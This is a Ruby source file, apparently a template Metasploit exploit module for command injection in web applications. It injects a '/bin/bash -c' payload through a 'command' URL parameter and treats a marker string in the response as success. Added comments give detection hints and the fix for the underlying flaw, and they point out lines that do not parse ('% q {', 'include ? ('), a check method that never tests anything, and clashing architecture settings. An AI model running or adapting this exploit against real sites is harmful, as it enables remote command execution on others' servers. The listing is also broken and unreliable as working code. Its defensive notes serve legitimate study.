code_exec2.rb
#!/usr/bin /ruby
require 'msf/core'
# Template-style Metasploit remote module that sends one HTTP GET carrying a
# shell command in a `command` query parameter and reads the response for a
# fixed success marker.
#
# The server-side weakness this models is a request parameter reaching a shell
# unmodified. Defensive takeaways from what the module sends:
# - access logs / WAF rules can look for a `command=` query parameter whose
#   value starts with `/bin/bash -c` (see #exploit);
# - the application fix is to stop passing request data to a shell (use an
#   argument-array exec or an allow-list of fixed operations).
#
# NOTE(review): several lines below do not parse as written (`% q {`,
# `include ? (`); this looks like extraction damage to the listing — confirm
# against the original file before relying on it.
class MetasploitModule < Msf::Exploit::Remote
# Provides send_request_cgi / normalize_uri / target_uri used below.
include Msf::Exploit::Remote::HttpClient
# Registers the module metadata and its two user-supplied options.
#
# @param info [Hash] metadata passed through to update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Injection Module',
# NOTE(review): `% q {` is not a valid percent-literal opener as written.
'Description' => % q {
This module exploits a Command injection vulnerability in websites that contain
vulnerable parameters in the URL.
},
# Placeholder author and reference values; no specific product or advisory is named.
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://example.com/'],
],
'Privileged' => false,
'Platform' => ['unix', 'linux'],
# NOTE(review): module-level Arch lists x86/x64 while the only target below
# declares ARCH_CMD — the two disagree; confirm which is intended.
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' => {
'BadChars' => "\x00"
},
'Targets' => [
['Generic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
],
],
'DefaultTarget' => 0
))
# TARGETURI has a placeholder default; USER is required and has no default.
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the vulnerable PHP application', '/path/to/target/param']),
OptString.new('USER', [true, 'The username'])
], self.class)
end
# Sends a plain GET to the configured path.
#
# NOTE(review): the response (`req`) is never inspected and `res` is assigned
# but unused, so this method does not actually determine whether the target is
# vulnerable. `failure` is a bare identifier not defined anywhere in this
# listing — presumably a check-code result was intended; verify.
def check
res = nil
req = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
failure
end
# Builds a `/bin/bash -c "<payload>"` string, sends it in the `command` query
# parameter of a GET to the target path (with `username` taken from the USER
# option), and reports success only when the response is HTTP 200 and its body
# contains the literal 'Command executed successfully'.
def exploit
# The encoded payload is wrapped in double quotes with no further quoting here.
command = "/bin/bash -c \"#{payload.encoded}\""
# This begin/end has no rescue or ensure clause, so it only groups the call.
begin
res = send_request_cgi({
'method' => 'GET',
# The command is interpolated into the URI string by this code, alongside a
# separate `vars_get` hash; how the two are merged depends on
# send_request_cgi — TODO confirm.
'uri' => normalize_uri(target_uri.path) + "?command=#{command}",
'vars_get' => {
'username' => datastore['USER'],
}
})
end
# NOTE(review): `include ? (` with spaces does not read as the `include?`
# predicate; looks like extraction damage — confirm.
# Success relies solely on a marker string in the response body.
if res and res.code == 200 and res.body.include ? ('Command executed successfully')
print_status("Exploit successful")
else
fail_with(Failure::Unknown, "Exploit Failed")
end
end
end